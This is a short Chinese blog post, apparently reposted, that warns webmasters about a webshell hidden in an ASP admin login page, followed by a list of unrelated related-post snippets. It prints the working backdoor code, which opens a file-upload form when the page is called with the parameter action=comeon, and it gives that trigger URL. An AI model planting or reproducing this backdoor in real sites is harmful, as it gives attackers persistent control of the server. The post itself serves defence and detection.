隐藏在管理员登录页面的危险
如果你的网站被入侵,你辛苦删掉以后,没好几天。又“病”了。建议你看看你的管理登录页面有没有类似下面这样的代码:
<%if request.QueryString("action")="comeon" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>
表面看是没什么区别的 这就是隐藏的WEBSHELL
只要这样:login.asp?action=comeon
出现了上传页面!
转载于:https://www.cnblogs.com/mujj/articles/1978710.html
隐藏在管理员登录页面的危险相关推荐
- web管理员登录页面
配置xml文件 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi=" ...
- day02【后台】管理员登录
day02[后台]管理员登录 1.创建常量类 创建常量类,用于管理整个系统中所用到的常量 public class CrowdConstant {public static final String ...
- Spring+SpringMVC+MyBatis明日方舟版人员信息管理系统前端页面代码前后端交互+SSM框架 管理员登录 游客登录 普通用户登录 人员的增删改查 信息更新 图片上传 分页查询)
Spring+SpringMVC+MyBatis明日方舟版人员信息管理系统前端页面代码(前后端交互+SSM框架 管理员登录 游客登录 普通用户登录 人员的增删改查 信息更新 图片上传 分页查询 修改密 ...
- 管理员用户不同身份登录页面代码PHP,wordpress管理员登录和普通用户登录后跳转到不同页面-♚付涛纪实阁♚...
这篇文章将向您展示WordPress用户登录后如何重定向到指定页面或者文章的技巧. 一.重定向到网站管理面板. 将以下代码添加到您的当前主题的 functions.php 文件中 二.重定向到指定页面 ...
- 第一天总结管理员用户的登录页面
管理员用户的登录页面: 先实例化出管理员用户 先获取前端发送的数据,把数据传给service中的方法,然后通过调用,返回一个布尔数据,对布尔数据进行判断,如果为true,则说明账号和密码都正确,把数据 ...
- HTML管理员页面怎么写,一个HTML管理员登录界面
管理员登录 rel=stylesheet type=text/css href="images/css.css"> body td { FONT-SIZE: 9pt; } 管 ...
- idea 启动界面导入项目_如何为您的项目启动有效的登录页面
idea 启动界面导入项目 by Christian-Peter Heimbach 通过克里斯蒂安·彼得·海姆巴赫 如何为您的项目启动有效的登录页面 (How to launch an effecti ...
- web渗透测试之攻破登录页面
web渗透测试之攻破登录页面 当我们在做渗透测试时,无论厂商项目还是src众测项目,都会遇到给一堆登录系统的URL,然后让我们自己去测,能不能进去全看天的状况,本文将讲一下怎么突破这种封闭的web系统 ...
- 设计登录页面测试用例,页面包括账号、密码和验证码,账号字符长度小于20,密码字符长度小于30,验证码数字和字母组合,长度为4
1. 正确输入账号.密码和验证码,登录成功. 2. 账号为空,应提示"请输入账号". 3. 账号长度为19个字符,符合要求. 4. 账号长度为20个字符,符合要求. 5. 账号长度 ...
最新文章
- 常用的python命令行解析库
- 如何领导团队做好技术债管理?
- 使用jq工具在Shell命令行处理JSON数据
- 计算机在热处理上有何应用,计算机在热处理中的应用
- 二层交换机和三层交换机的区别
- Error: Cannot find module ‘babel-preset-es2015‘
- 阿里云服务器ECS中扩容云盘后磁盘容量没有增加的解决方法
- python实现数据恢复软件手机版下载_知名下载软件,总算出手机版了
- 「硬见小百科」100个示波器基础知识问答
- 不藏了,我的一千行 MySQL 学习笔记(2万字长文)
- 机器学习图像特征提取—颜色(RGB、HSV、Lab)特征提取并绘制直方图
- CAD角度标注命令,标注CAD图纸
- markdown化学表达式
- 三种遍历 list对象从而选择性取值的方式
- JetBrains 在中国被频繁破解,官方是如何看待的
- 数据库中的三种完整性:域、实体、参照完整性
- java使用CRC32计算校验和
- 属猪人士的2009年运程
- linux. signal信号,Linux下signal信号汇总
- 5G时代来临,一张思维导图描绘未来场景